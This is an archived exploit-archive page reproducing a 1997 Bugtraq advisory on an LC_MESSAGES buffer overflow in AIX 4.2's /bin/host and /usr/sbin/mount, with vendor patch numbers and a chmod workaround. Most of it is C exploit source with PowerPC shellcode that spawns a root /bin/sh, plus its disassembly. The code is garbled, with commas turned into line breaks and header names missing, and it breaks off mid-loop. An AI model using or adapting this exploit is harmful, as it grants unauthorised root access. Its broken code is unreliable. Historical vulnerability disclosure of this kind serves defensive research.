AIX LC_MESSAGES /usr/sbin/mount and /bin/host holes


AIX LC_MESSAGES /usr/sbin/mount and /bin/host holes
Description:  Standard buffer overflow
using LC_MESSAGES
Author: Georgi Guninski (guninski@linux2.vmei.acad.bg)
Compromise:   root  (local)
Vulnerable Systems: AIX 4.2
possibly 4.1 and more
Date:  3 April 1997
Notes:
Exploit:


Date: Thu
3 Apr 1997 21:52:41 +0200
From: Georgi Guninski
Reply-To: guninski@hotmail.com
To: BUGTRAQ@NETSPACE.ORG
Subject: AIX 4.2 LC_MESSAGES + mount exploit

Hello all

There seem to exist a buffer overflow condition in AIX 4.2/4.1/? when
the shell variable LC_MESSAGES is long enough.
/bin/host and /usr/sbin/mount are vulnerable to spawning a root shell.

Solutions:
1) IBM was informed on 972903 and on 970403 wrote the following:
>The APARs are going through the regression test lab right now and should
>be available by next week. Here are the numbers:
> AIX 4.2:  APAR IX67377
> AIX 4.1:  APAR IX67407
> AIX 3.2:  APAR IX67405
2) a little bit ugly
but works:
#chmod -s /bin/host /usr/sbin/mount
3) I have not tested it
but if you are in the mood you may try to
change LC_MESSAGES in /usr/lib/libc.a
/usr/lib/* and everywhere else to
something unpredictable.

If the C program does not work
try the ksh script which does some brute
forcing.

PLEASE NOTE my e-mail addresses bellow and do NOT REPLY to this message.

Georgi Guninski
guninski@hotmail.com
stgun@sgg.vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711

---test2.c--------------------------------------------------------------------
-----------------------
/*
AIX 4.2/4.1 LC_MESSEGAS /usr/sbin/mount exploit by Georgi Guninski

----------------------------------------
DISCLAIMER

This program is for educational purpose ONLY. Do not use it without
permission.
The usual standard disclaimer applies
especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of
the information or functionality provided by this program.
Georgi Guninski
his employer or any Internet provider bears NO
responsibility for content
or misuse of this program or any derivatives thereof.
By using this program you accept the fact that any damage (dataloss

system
crash
system compromise
etc.) caused by the use of this program is
not
Georgi Guninski's responsibility.

In case you distribute this
please keep the disclaimer and my
addresses.
-----------------------------------------
Use the IBM C compiler.
Compile with: cc -g test2.c
-----------------
Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711



Suggestions
comments and job offers are welcome!


22-Mar-97
*/
#include
#include
#include


char prog[100]="/usr/sbin/mount";
char prog2[30]="mount";
extern int execv();

char *createvar(char *name
char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c
name);
strcat(c
=
);
strcat(c
value);
putenv(c);
return c;
}

/*The program*/
main(int argc
char **argv
char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6
0x9421fbb0
0x90010458
0x3c60f019

0x60632c48
0x90610440
0x3c60d002
0x60634c0c

0x90610444
0x3c602f62
0x6063696e
0x90610438

0x3c602f73
0x60636801
0x3863ffff
0x9061043c

0x30610438
0x7c842278
0x80410440
0x80010444

0x7c0903a6
0x4e800420
0x0
};
/* disassembly
7c0802a6        mfspr   r0
LR
9421fbb0        stu     SP
-1104(SP) --get stack
90010458        st      r0
1112(SP)
3c60f019        cau     r3
r0
0xf019 --CTR
60632c48        lis     r3
r3
11336  --CTR
90610440        st      r3
1088(SP)
3c60d002        cau     r3
r0
0xd002 --TOC
60634c0c        lis     r3
r3
19468  --TOC
90610444        st      r3
1092(SP)
3c602f62        cau     r3
r0
0x2f62 --'/bin/sh\x01'
6063696e        lis     r3
r3
26990
90610438        st      r3
1080(SP)
3c602f73        cau     r3
r0
0x2f73
60636801        lis     r3
r3
26625
3863ffff        addi    r3
r3
-1
9061043c        st      r3
1084(SP) --terminate with 0
30610438        lis     r3
SP
1080
7c842278        xor     r4
r4
r4    --argv=NULL
80410440        lwz     RTOC
1088(SP)
80010444        lwz     r0
1092(SP) --jump
7c0903a6        mtspr   CTR
r0
4e800420        bctr              --jump
*/

#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i
nop
mn;
int max;
int QUIET=0;
int dobuf=0;
char VAR[30]="LC_MESSAGES";
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int egg=1;
int ch;
unsigned int reta; /* return address */
int corr=4604;
char *args[4];
char *newenv[8];
int justframes=1;
int startwith=0;

mn=78;
max=100;

if (argc>1)
corr = atoi(argv[1]);

pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;

if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}

#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) &
0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);

reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;

for(nop=0;nop

Addendum(if any):




[Back] to Fyodor's Exploit World!